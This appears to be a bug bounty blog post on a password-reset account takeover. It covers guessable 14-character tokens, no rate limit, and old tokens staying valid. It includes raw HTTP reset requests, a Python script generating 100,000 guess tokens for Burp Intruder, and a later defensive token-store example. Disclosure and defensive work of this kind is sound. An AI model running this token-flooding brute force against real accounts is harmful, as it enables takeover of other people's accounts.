Zero-Click Account Takeover

0xEbn-Taimia
3 min read · Aug 5, 2024


بِسْمِ اللَّـهِ الرَّحْمَـٰنِ الرَّحِيمِ | In the name of God, the most gracious, the most merciful

Edit: The triager was right. The token is too long, so the attack would need too many requests, which amounts to a DoS attack; it would only be practical with a shorter token.

Hello hackers, my name is Momen Samir (0xEbn-Taimia). Today I'll be discussing a bug that I recently found on a HackerOne target, which I'll refer to as target.com.

First of all, this account takeover (ATO) depends on a few other bugs; let me explain:

1- The password reset link uses a weak token (14 characters, which can be guessed)

2- There is no rate limit on sending a new-password link

3- The older token in the link did not expire after a new one was issued

Now, to reproduce:

1- Create a new account, log out, then send the password reset request to Burp Intruder:

POST /api/v1/password/forgot HTTP/1.1
Host: identity.target.com
Cookie: ;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.target.com/
Content-Type: application/json
X-Client-Platform: web
Content-Length: 42
Origin: https://www.target.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Priority: u=0
Te: trailers
Connection: close

{"emailAddress":"victim-email@google.com"}

After sending the request you'll get a link with a token like this:

https://www.target.com/account/reset-password?token=14-digits-token

2- Capture the confirm-new-password request:

POST /api/v1/password/forgot/update HTTP/1.1
Host: identity.target.com
Cookie: ;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.target.com/
Content-Type: application/json
X-Client-Platform: web
Content-Length: 42
Origin: https://www.target.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Priority: u=0
Te: trailers
Connection: close

{"newPassword":"new-password","newPasswordConfirm":"new-password","authorizationCode":"14-digits-token"}

But there was some protection: "the token expires after 5 minutes".

So, to bypass it and perform the attack, we will do the following:

1- Send both requests to Burp Intruder

2- In the first request (the send-reset-password-link request), set the payload to a null payload and send it

3- In the second request (the confirm-new-password request), use a Python script to generate 100,000 14-character tokens and send them with Intruder:

import random
import string
import os

def generate_payloads(num_payloads, length):
    # Tokens are drawn from the same alphabet as the target's: lowercase letters and digits
    characters = string.ascii_lowercase + string.digits
    payloads = [''.join(random.choices(characters, k=length)) for _ in range(num_payloads)]
    return payloads

num_payloads = 100000  # Set the number of payloads
length = 14
payloads = generate_payloads(num_payloads, length)

# Write one payload per line so Burp Intruder can load the file as a simple list
file_path = os.path.abspath('payloads.txt')
with open(file_path, 'w') as file:
    for payload in payloads:
        file.write(payload + '\n')

print(f'{num_payloads} payloads of length {length} generated and saved to {file_path}')

So, let me explain:

1- In the first request we set the victim's account and send a very large number of password reset links, each containing a token.

The token expires after 5 minutes, but we bypass that by sending many requests with new tokens every second, since there is no rate limit.

And the older tokens stay valid for 5 minutes after we send new ones.

2- In the meantime we send confirm-new-password requests with our generated token list; once one of our tokens matches an existing one, we get a 200 OK and the password is changed successfully.

And boom! I successfully changed the password of the victim's account.

The point is that we can keep a very large number of tokens valid at the same time as we guess them: because the token space is not large and many tokens stay valid at once, the chance of guessing one is very high.
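From the defender's side, the three weaknesses above (a short guessable token, no rate limit on the reset endpoint, and earlier tokens staying valid after a new one is issued) are each cheap to close. The following reset-token store is an added example written for this post, not target.com's code or anything from the HackerOne report: it draws 256-bit tokens from the OS CSPRNG, stores only their hashes, revokes the previous token whenever a new one is issued, makes tokens single-use, and rate-limits reset requests per account. The 5-minute expiry matches the post; the rate-limit values, the class and function names, and the victim@example.com address are assumptions.

```python
import hashlib
import secrets
import time
from collections import defaultdict, deque

# Policy values are assumptions for this example; the 5-minute expiry
# matches the one described in the post.
TOKEN_TTL_SECONDS = 300
MAX_RESETS_PER_WINDOW = 3
RATE_WINDOW_SECONDS = 3600


def _digest(token):
    # Only the hash of a token is stored, so a leaked table exposes no usable tokens.
    return hashlib.sha256(token.encode()).hexdigest()


class ResetTokenStore:
    """Hypothetical reset-token store closing the three weaknesses in the post:
    high-entropy tokens, per-account rate limiting, and revocation of any
    earlier token when a new one is issued (tokens are also single-use)."""

    def __init__(self, now=time.time):
        self._now = now                      # injectable clock for testing
        self._tokens = {}                    # token digest -> (email, expires_at)
        self._current = {}                   # email -> digest of the only live token
        self._requests = defaultdict(deque)  # email -> timestamps of recent issues

    def _rate_limited(self, email, now):
        recent = self._requests[email]
        while recent and recent[0] <= now - RATE_WINDOW_SECONDS:
            recent.popleft()
        if len(recent) >= MAX_RESETS_PER_WINDOW:
            return True
        recent.append(now)
        return False

    def issue(self, email):
        """Return a fresh token to deliver by email, or None if the account is rate-limited."""
        now = self._now()
        if self._rate_limited(email, now):
            return None
        # Issuing a new token revokes the previous one, so a flood of reset
        # requests never leaves a growing pool of simultaneously valid tokens.
        old = self._current.pop(email, None)
        if old is not None:
            self._tokens.pop(old, None)
        token = secrets.token_urlsafe(32)    # 256 bits from the OS CSPRNG
        digest = _digest(token)
        self._tokens[digest] = (email, now + TOKEN_TTL_SECONDS)
        self._current[email] = digest
        return token

    def redeem(self, token):
        """Consume a token. Return the account email on success, otherwise None."""
        # pop() makes the token single-use whether or not it turns out to be valid.
        entry = self._tokens.pop(_digest(token), None)
        if entry is None:
            return None
        email, expires_at = entry
        self._current.pop(email, None)
        if self._now() > expires_at:
            return None
        return email


def demo():
    """Walk through the properties above with a controllable clock (constructed data)."""
    clock = [1_000.0]
    store = ResetTokenStore(now=lambda: clock[0])
    first = store.issue("victim@example.com")
    second = store.issue("victim@example.com")
    results = {
        "old_token_rejected": store.redeem(first) is None,
        "current_token_accepted": store.redeem(second) == "victim@example.com",
        "replay_rejected": store.redeem(second) is None,
    }
    third = store.issue("victim@example.com")
    results["fourth_request_rate_limited"] = store.issue("victim@example.com") is None
    clock[0] += TOKEN_TTL_SECONDS + 1
    results["expired_token_rejected"] = store.redeem(third) is None
    results["random_guess_rejected"] = store.redeem(secrets.token_urlsafe(32)) is None
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'pass' if ok else 'FAIL'}")
```

Revoking the previous token on each issue is the change that directly breaks the technique described in this post: no matter how many reset emails are triggered, exactly one token per account is ever live, so flooding the endpoint cannot widen the guessing target. The rate limit then also makes the flood itself visible, since rejected issue() calls are a natural point to log and alert on.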

But unfortunately H1 triage closed it as Informative, because the DoS attack is out of scope!

In the end, we can't stop saying:

Thank god | الْحَمْدُ لِلَّهِ
